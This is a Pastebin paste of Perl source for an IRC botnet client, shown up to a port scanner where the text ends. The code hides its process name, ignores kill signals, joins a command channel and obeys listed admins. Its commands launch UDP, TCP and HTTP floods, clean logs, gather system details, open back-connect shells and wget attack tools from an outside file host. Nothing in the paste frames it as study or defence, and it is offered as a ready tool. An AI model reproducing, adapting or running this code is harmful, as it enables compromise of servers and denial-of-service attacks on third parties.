Advertisement
LastMalware

Untitled

May 12th, 2019
2,567
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 418.04 KB | None | 0 0
  1. #Codded By LastMalware
  2. #Kiba Não Comédia.
  3. #!/usr/bin/perl
  4.  
  5. my $processo = 'https';
  6.  
  7. my $linas_max='100';
  8.  
  9. my $sleep='50';
  10.  
  11. my $cmd="";
  12.  
  13. my $id="";
  14.  
  15. ############################################
  16. #Nick's De Quem Terá Permissões
  17.  
  18. my @adms=("dr0x", "LastMalware", "Elbon");
  19.  
  20. #Canal Da Botnet
  21. my @canais=("#cheirasaC0c0");
  22.  
  23. my $chanpass = "_null";
  24.  
  25. ##Cron
  26.  
  27. $num = int rand(100000);
  28. #Nick Do Zumbi
  29. my $nick = "x" . $num . "";
  30.  
  31.  
  32.  
  33. #Prefixo
  34.  
  35. my $ircname ='Bot';
  36.  
  37. chop (my $realname = '[[x_x]]-');
  38.  
  39. #Server E Porta
  40.  
  41. $servidor='euroserv.fr.quakenet.org' unless $servidor;
  42.  
  43. my $porta='6667';
  44.  
  45. ############################################
  46.  
  47. $SIG{'INT'} = 'IGNORE';
  48.  
  49. $SIG{'HUP'} = 'IGNORE';
  50.  
  51. $SIG{'TERM'} = 'IGNORE';
  52.  
  53. $SIG{'CHLD'} = 'IGNORE';
  54.  
  55. $SIG{'PS'} = 'IGNORE';
  56.  
  57. use IO::Socket;
  58.  
  59. use Socket;
  60.  
  61. use IO::Select;
  62.  
  63. chdir("/");
  64.  
  65.  
  66.  
  67. #Conectar
  68.  
  69. $servidor="$ARGV[0]" if $ARGV[0];
  70.  
  71. $0="$processo"."\0"x16;;
  72.  
  73. my $pid=fork;
  74.  
  75. exit if $pid;
  76.  
  77. die "Masalah fork: $!" unless defined($pid);
  78.  
  79.  
  80.  
  81. our %irc_servers;
  82.  
  83. our %DCC;
  84.  
  85. my $dcc_sel = new IO::Select->new();
  86.  
  87. $sel_cliente = IO::Select->new();
  88.  
  89. sub sendraw {
  90.  
  91. if ($#_ == '1') {
  92.  
  93. my $socket = $_[0];
  94.  
  95. print $socket "$_[1]\n";
  96.  
  97.  
  98.  
  99. } else {
  100.  
  101. print $IRC_cur_socket "$_[0]\n";
  102.  
  103. }
  104.  
  105. }
  106.  
  107.  
  108.  
  109. sub conectar {
  110.  
  111. my $meunick = $_[0];
  112.  
  113. my $servidor_con = $_[1];
  114.  
  115. my $porta_con = $_[2];
  116.  
  117.  
  118.  
  119. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
  120.  
  121. PeerPort=>$porta_con) or return(1);
  122.  
  123. if (defined($IRC_socket)) {
  124.  
  125. $IRC_cur_socket = $IRC_socket;
  126.  
  127. $IRC_socket->autoflush(1);
  128.  
  129. $sel_cliente->add($IRC_socket);
  130.  
  131. $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  132.  
  133. $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  134.  
  135. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  136.  
  137. $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  138.  
  139. nick("$meunick");
  140.  
  141. sendraw("PASS Fuck");
  142.  
  143. sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  144.  
  145. sleep 1;
  146.  
  147. }
  148.  
  149. }
  150.  
  151.  
  152.  
  153. my $line_temp;
  154.  
  155. while( 1 ) {
  156.  
  157. while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  158.  
  159. select(undef, undef, undef, 0.01); #sleeping for a fraction of a second keeps the script from running to 100 cpu usage ^_^
  160.  
  161. delete($irc_servers{''}) if (defined($irc_servers{''}));
  162.  
  163. my @ready = $sel_cliente->can_read(0);
  164.  
  165. next unless(@ready);
  166.  
  167. foreach $fh (@ready) {
  168.  
  169. $IRC_cur_socket = $fh;
  170.  
  171. $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  172.  
  173. $nread = sysread($fh, $msg, 4096);
  174.  
  175. if ($nread == 0) {
  176.  
  177. $sel_cliente->remove($fh);
  178.  
  179. $fh->close;
  180.  
  181. delete($irc_servers{$fh});
  182.  
  183. }
  184.  
  185. @lines = split (/\n/, $msg);
  186.  
  187. for(my $c=0; $c<= $#lines; $c++) {
  188.  
  189. $line = $lines[$c];
  190.  
  191. $line=$line_temp.$line if ($line_temp);
  192.  
  193. $line_temp='';
  194.  
  195. $line =~ s/\r$//;
  196.  
  197. unless ($c == $#lines) {
  198.  
  199. parse("$line");
  200.  
  201. } else {
  202.  
  203. if ($#lines == 0) {
  204.  
  205. parse("$line");
  206.  
  207. } elsif ($lines[$c] =~ /\r$/) {
  208.  
  209. parse("$line");
  210.  
  211. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  212.  
  213. parse("$line");
  214.  
  215. } else {
  216.  
  217. $line_temp = $line;
  218.  
  219. }
  220.  
  221. }
  222.  
  223. }
  224.  
  225. }
  226.  
  227. }
  228.  
  229.  
  230.  
  231. sub parse {
  232.  
  233. my $servarg = shift;
  234.  
  235. if ($servarg =~ /^PING \:(.*)/) {
  236.  
  237. sendraw("PONG :$1");
  238.  
  239. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  240.  
  241. my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  242.  
  243. if ($args =~ /^\001VERSION\001$/) {
  244.  
  245. notice("$pn", "\001VERSION mIRC v7.25 CyberBot\001");
  246.  
  247. }
  248.  
  249. if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
  250.  
  251. if ($onde eq "$meunick"){
  252.  
  253. zr("$pn", "$args");
  254.  
  255. }
  256.  
  257. #End of Connect
  258.  
  259. if ($args =~ /^(\Q$meunick\E|\_null)\s+(.*)/ ) {
  260.  
  261. my $natrix = $1;
  262.  
  263. my $arg = $2;
  264.  
  265. if ($arg =~ /^\!(.*)/) {
  266.  
  267. ircase("$pn","$onde","$1") unless ($natrix eq "_null" and $arg =~ /^\!nick/);
  268.  
  269. } elsif ($arg =~ /^\@(.*)/) {
  270.  
  271. $ondep = $onde;
  272.  
  273. $ondep = $pn if $onde eq $meunick;
  274.  
  275. bfunc("$ondep","$1");
  276.  
  277. } else {
  278.  
  279. zr("$onde", "$arg");
  280.  
  281. }
  282.  
  283. }
  284.  
  285. }
  286.  
  287. }
  288.  
  289. ######################### End of prefix
  290.  
  291. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  292.  
  293. if (lc($1) eq lc($meunick)) {
  294.  
  295. $meunick=$4;
  296.  
  297. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  298.  
  299. }
  300.  
  301. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  302.  
  303. nick("$meunick|".int rand(999999));
  304.  
  305. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  306.  
  307. $meunick = $2;
  308.  
  309. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  310.  
  311. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  312.  
  313. foreach my $canal (@canais) {
  314.  
  315. sendraw("JOIN $canal $chanpass");
  316.  
  317. }
  318.  
  319. }
  320.  
  321. }
  322.  
  323.  
  324.  
  325. sub bfunc {
  326.  
  327. my $printl = $_[0];
  328.  
  329. my $funcarg = $_[1];
  330.  
  331. if (my $pid = fork) {
  332.  
  333. waitpid($pid, 0);
  334.  
  335. } else {
  336.  
  337. if (fork) {
  338.  
  339. exit;
  340.  
  341. } else {
  342.  
  343.  
  344.  
  345. if ($funcarg =~ /^killme/) {
  346.  
  347. sendraw($IRC_cur_socket, "QUIT :");
  348.  
  349. $killd = "kill -9 ".fork;
  350.  
  351. system (`$killd`);
  352.  
  353. }
  354.  
  355. ######################
  356.  
  357. # Commands #
  358.  
  359. ######################
  360.  
  361. if ($funcarg =~ /^commands/) {
  362.  
  363. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@9-[BY.ZR Perl Bot Commands List]-14@4] ");
  364.  
  365. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Hacking Based]-----14@4] ");
  366.  
  367. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3multiscan <vuln> <dork>");
  368.  
  369. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3socks5");
  370.  
  371. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3sql <vuln> <dork>");
  372.  
  373. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3portscan <ip>");
  374.  
  375. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3logcleaner");
  376.  
  377. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3sendmail <subject> <sender> <recipient> <message>");
  378.  
  379. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3system");
  380.  
  381. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3cleartmp");
  382.  
  383. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3rootable");
  384.  
  385. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3nmap <ip> <beginport> <endport>");
  386.  
  387. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3back <ip><port>");
  388.  
  389. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3linuxhelp");
  390.  
  391. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3cd tmp:. | for example");
  392.  
  393. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Advisory/New Based]-----14@4] ");
  394.  
  395. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3packetstorm");
  396.  
  397. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3milw0rm");
  398.  
  399. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[DDos Based]-----14@4] ");
  400.  
  401. sendraw($IRC_cur_socket, "PRIVMSG $printl :7-nr1 14@3dr0x.udp <host> <packet size> <time>");
  402.  
  403. sendraw($IRC_cur_socket, "PRIVMSG $printl :7-nr1 14@3udp <host> <port> <packet size> <time>");
  404.  
  405. sendraw($IRC_cur_socket, "PRIVMSG $printl :7-nr1 14@3tcpflood <host> <port> <packet size> <time>");
  406.  
  407. sendraw($IRC_cur_socket, "PRIVMSG $printl :7-nr1 14@3httpflood <host> <time>");
  408.  
  409. sendraw($IRC_cur_socket, "PRIVMSG $printl :7-nr1 14@3sqlflood <host> <time>");
  410.  
  411. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[IRC Based]-----14@4] ");
  412.  
  413. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3killme");
  414.  
  415. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3join #channel");
  416.  
  417. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3part #channel");
  418.  
  419. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3reset");
  420.  
  421. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3voice <who> ");
  422.  
  423. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3owner <who> ");
  424.  
  425. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3deowner <who> ");
  426.  
  427. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3devoice <who> ");
  428.  
  429. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3halfop <who> ");
  430.  
  431. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dehalfop <who> ");
  432.  
  433. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3op <who> ");
  434.  
  435. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3deop <who> ");
  436.  
  437. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Flooding Based]-----14@4] ");
  438.  
  439. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3msgflood <who> ");
  440.  
  441. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dccflood <who> ");
  442.  
  443. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3ctcpflood <who> ");
  444.  
  445. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3noticeflood <who> ");
  446.  
  447. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3channelflood");
  448.  
  449. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3maxiflood <who> ");
  450.  
  451. sendraw("JOIN #BekUPManitosLote2222");
  452.  
  453. }
  454.  
  455.  
  456.  
  457. if ($funcarg =~ /^linuxhelp/) {
  458.  
  459. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Linux Help]-----14@4] ");
  460.  
  461. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Dir where you are : pwd");
  462.  
  463. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Start a Perl file : perl file.pl");
  464.  
  465. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Go back from dir : cd ..");
  466.  
  467. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Force to Remove a file/dir : rm -rf file/dir;ls -la");
  468.  
  469. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Show all files/dir with permissions : ls -lia");
  470.  
  471. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Find config.inc.php files : find / -type f -name config.inc.php");
  472.  
  473. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Find all writable folders and files : find / -perm -2 -ls");
  474.  
  475. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Find all .htpasswd files : find / -type f -name .htpasswd");
  476.  
  477. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@ 3Find all service.pwd files : find / -type f -name service.pwd");
  478.  
  479. }
  480.  
  481.  
  482.  
  483. if ($funcarg =~ /^help/) {
  484.  
  485. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Help Commands]-----14@4] ");
  486.  
  487. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3flooding - For IRC Flooding Help");
  488.  
  489. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3irc - For IRC Bot Command Help ");
  490.  
  491. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3ddos - For DDos Command Help");
  492.  
  493. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3news - For Security News Command Help ");
  494.  
  495. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3hacking - For Hacking Command Help");
  496.  
  497. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3linuxhelp - For Linux Help");
  498.  
  499. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3extras");
  500.  
  501. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3version - For version info");
  502.  
  503. sendraw("JOIN #BekUPManitosLote2222");
  504.  
  505. }
  506.  
  507.  
  508. if ($funcarg =~ /^suicide/) {
  509.  
  510. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[dr0x Helper]-----14@4] ");
  511.  
  512. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dr0x.udp ");
  513.  
  514. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dr0x.http ");
  515.  
  516. sendraw("JOIN #BekUPManitosLote2222");
  517.  
  518. }
  519.  
  520.  
  521. if ($funcarg =~ /^flooding/) {
  522.  
  523. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[14@13-----[Flooding Based]-----14@4] ");
  524.  
  525. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3msgflood <who> ");
  526.  
  527. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dccflood <who> ");
  528.  
  529. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3ctcpflood <who> ");
  530.  
  531. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3noticeflood <who> ");
  532.  
  533. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3channelflood");
  534.  
  535. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3maxiflood <who> ");
  536.  
  537. }
  538.  
  539.  
  540.  
  541. if ($funcarg =~ /^irc/) {
  542.  
  543. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13-----[IRC Commands]-----14@12] ");
  544.  
  545. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3voice <who> ");
  546.  
  547. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3owner <who> ");
  548.  
  549. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3deowner <who> ");
  550.  
  551. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3devoice <who> ");
  552.  
  553. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3halfop <who> ");
  554.  
  555. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3dehalfop <who> ");
  556.  
  557. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3op <who> ");
  558.  
  559. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3deop <who> ");
  560.  
  561. }
  562.  
  563.  
  564.  
  565. if ($funcarg =~ /^ddos/) {
  566.  
  567. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13-----[Ddos Commands by W1CK ]-----14@12] ");
  568.  
  569. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3udpflood <host> <packet size> <time>");
  570.  
  571. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3udp <host> <port> <packet size> <time>");
  572.  
  573. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3tcpflood <host> <port> <packet size> <time>");
  574.  
  575. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3httpflood <host> <time>");
  576.  
  577. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3sqlflood <host> <time>");
  578.  
  579. sendraw($IRC_cur_socket, "PRIVMSG $printl :7[14@13-----[Extras Ddos Commands]-----14@12] ");
  580.  
  581. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3syn <destip> <destport> <time in seconds>");
  582.  
  583. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3sudp <host> <port> <reflection file> <threads> <time> | Requires ./50 installed");
  584.  
  585. sendraw($IRC_cur_socket, "PRIVMSG $printl :7[14@13Go to extras to install required scripts14@12] ");
  586.  
  587. sendraw("JOIN #BekUPManitosLote2222");
  588.  
  589.  
  590.  
  591. }
  592.  
  593.  
  594.  
  595. if ($funcarg =~ /^news/) {
  596.  
  597. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13-----[News Commands]-----14@12] ");
  598.  
  599. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3packetstorm");
  600.  
  601. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3milw0rm");
  602.  
  603. }
  604.  
  605.  
  606.  
  607. if ($funcarg =~ /^hacking/) {
  608.  
  609. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13-----[Hacking Commands]-----14@12] ");
  610.  
  611. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3multiscan <vuln> <dork>");
  612.  
  613. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3socks5");
  614.  
  615. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3portscan <ip>");
  616.  
  617. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3logcleaner");
  618.  
  619. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3sendmail <subject> <sender> <recipient> <message>");
  620.  
  621. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3system");
  622.  
  623. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3cleartmp");
  624.  
  625. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3rootable");
  626.  
  627. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3nmap <ip> <beginport> <endport>");
  628.  
  629. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3back <ip><port>");
  630.  
  631. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3linuxhelp");
  632.  
  633. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3cd tmp:. | for example");
  634.  
  635. }
  636.  
  637. if ($funcarg =~ /^extras/) {
  638.  
  639. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13-----[Extras]-----14@12] ");
  640.  
  641. sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[14@13To install these scripts you need gcc installed14@12] ");
  642.  
  643. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3install-syn Syn.c");
  644.  
  645. sendraw($IRC_cur_socket, "PRIVMSG $printl :7_null 14@3install-50x 50x.c");
  646.  
  647. }
  648.  
  649. ######################
  650.  
  651. # End of Help #
  652.  
  653. ######################
  654.  
  655.  
  656.  
  657.  
  658.  
  659. ######################
  660.  
  661. # Commands #
  662.  
  663. ######################
  664.  
  665. if ($funcarg =~ /^system/) {
  666.  
  667. sendraw($IRC_cur_socket, "PRIVMSG $printl Come on and hit that ricky");
  668.  
  669. }
  670.  
  671. if ($funcarg =~ /^sys/) {
  672.  
  673. $uname=`uname -a`;
  674.  
  675. $uptime=`uptime`;
  676.  
  677. $ownd=`pwd`;
  678.  
  679. $distro=`cat /etc/issue`;
  680.  
  681. $id=`id`;
  682.  
  683. $un=`uname -sro`;
  684.  
  685. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Info BOT : 7 Servidor :Hiden : 6667");
  686.  
  687. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uname -a : 7 $uname");
  688.  
  689. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uptime : 7 $uptime");
  690.  
  691. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Prosses : 7 $processo");
  692.  
  693. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12ID : 7 $id");
  694.  
  695. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Dir : 7 $ownd");
  696.  
  697. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12OS : 7 $distro");
  698.  
  699. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Owner : 7 fuck");
  700.  
  701. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Channel : 7 #berau");
  702.  
  703. }
  704.  
  705.  
  706.  
  707. if ($funcarg =~ /^milw0rm/) {
  708.  
  709. my @ltt=();
  710.  
  711. my @bug=();
  712.  
  713. my $x;
  714.  
  715. my $page="";
  716.  
  717. my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
  718.  
  719. print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  720.  
  721. my @r = <$socke>;
  722.  
  723. $page="@r";
  724.  
  725. close($socke);
  726.  
  727. while ($page =~ m/<title>(.*)</g){
  728.  
  729. $x = $1;
  730.  
  731. if ($x =~ /\&lt\;/) {
  732.  
  733. $x =~ s/\&lt\;/</g;
  734.  
  735. }
  736.  
  737. if ($x !~ /milw0rm/) {
  738.  
  739. push (@bug,$x);
  740.  
  741. }
  742.  
  743. }
  744.  
  745. while ($page =~ m/<link.*expl.*([0-9]...)</g) {
  746.  
  747. if ($1 !~ m/milw0rm.com|exploits|en/){
  748.  
  749. push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
  750.  
  751. }
  752.  
  753. }
  754.  
  755. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3milw0rm12:.4|12 Latest exploits :");
  756.  
  757. foreach $x (0..(@ltt - 1)) {
  758.  
  759. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3milw0rm12:.4|12 $bug[$x] - $ltt[$x]");
  760.  
  761. sleep 1;
  762.  
  763. }
  764.  
  765. }
  766.  
  767. ######################
  768.  
  769. # Devisings shit #
  770.  
  771. ######################
  772.  
  773. #######################
  774.  
  775. # Version info #
  776.  
  777. #######################
  778.  
  779. if ($funcarg =~ /^version/) {
  780.  
  781. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Version4:.12|4 Devising's Modded perlbot v2.");
  782.  
  783. }
  784.  
  785. #######################
  786.  
  787. # End of Version info #
  788.  
  789. #######################
  790.  
  791. #some links could be dead just updated there public scripts noob
  792.  
  793. if ($funcarg =~ /^install-udp/) {
  794.  
  795. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Installing UDP4:.12|4 Please wait...");
  796.  
  797. system 'cd /root';
  798.  
  799. system 'wget https://cld.pt/dl/download/9b97ed85-4a8d-480f-ba91-c630cda8084b/udp.c';
  800.  
  801. system 'gcc -o udp udp.c -pthread';
  802.  
  803. system 'rm -rf udp.c';
  804.  
  805. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Installing UDP4:.12|4|--UDP is now installed and compiled :)");
  806.  
  807. }
  808.  
  809.  
  810.  
  811. if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
  812.  
  813. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3UDP DDoS12:.4|12 Attacking 4 ".$1.":".$2."12 for 4 ".$3." 12 seconds.");
  814.  
  815. system "cd /root";
  816.  
  817. system "./udp ".$1." ".$2." 3 65500 1024 ".$3." ";
  818.  
  819. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3UDP DDoS12:.4|12 Attack Finished 4");
  820.  
  821. }
  822.  
  823.  
  824. if ($funcarg =~ /^install-drop/) {
  825.  
  826. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Installing drop4:.12|4 Please wait...");
  827.  
  828. system 'cd /root';
  829.  
  830. system 'wget https://cld.pt/dl/download/6f773259-7aa6-46b4-bc23-453183506ff4/x48.py';
  831.  
  832. }
  833.  
  834. if ($funcarg =~ /^drop\s+(.*)/) {
  835.  
  836. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3HTTPDROP DDoS12:.4|12 Attacking 4 ".$1.":".$2."12 for 4 ".$3." 12 seconds.");
  837.  
  838. system "cd /root";
  839.  
  840. system "x48.py ".$1."";
  841.  
  842. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3HTTPDROP DDoS12:.4|12 Attack Finished 4");
  843.  
  844. }
  845.  
  846.  
  847. #some links could be dead just updated there public scripts noob
  848.  
  849. if ($funcarg =~ /^install-nytro/) {
  850.  
  851. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Installing NYTRO4:.12|4 Please wait...");
  852.  
  853. system 'cd /root';
  854.  
  855. system 'wget https://cld.pt/dl/download/1ab54687-c080-4f6f-b17a-c578f77b9d79/nytro.pl';
  856.  
  857. sendraw($IRC_cur_socket, "PRIVMSG $printl :12|4.:3Installing NYTRO4:.12|4|--NYTRO is now installed and compiled :)");
  858.  
  859. }
  860.  
  861.  
  862.  
  863. if ($funcarg =~ /^nytro\s+(.*)\s+(\d+)\s+(\d+)/) {
  864.  
  865. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3NYTRO DDoS12:.4|12 Attacking 4 ".$1.":".$2."12 for 4 ".$3." 12 seconds.");
  866.  
  867. system 'cd /root';
  868.  
  869. system "perl nytro.pl ".$1." ".$2." ".$3." ".$4." ";
  870.  
  871. sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:3NYTRO DDoS12:.4|12 Attack Finished 4");
  872.  
  873. }
  874.  
  875.  
  876.  
  877.  
  878. ######################
  879.  
  880. # End of Devisings #
  881.  
  882. # Shit #
  883.  
  884. ######################
  885.  
  886.  
  887.  
  888.  
  889.  
  890. ######################
  891.  
  892. # Portscan #
  893.  
  894. ######################
  895.  
  896.  
  897.  
  898. if ($funcarg =~ /^portscan (.*)/) {
  899.  
  900. my $hostip="$1";
  901.  
  902. @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
  903.  
  904. my (@aberta, %porta_banner);
  905.  
  906. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Port-Scanner12] Scanning for open ports on ".$1." 12 started .");
  907.  
  908. foreach my $porta (@portas) {
  909.  
  910. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
  911.  
  912. 'tcp', Timeout => 4);
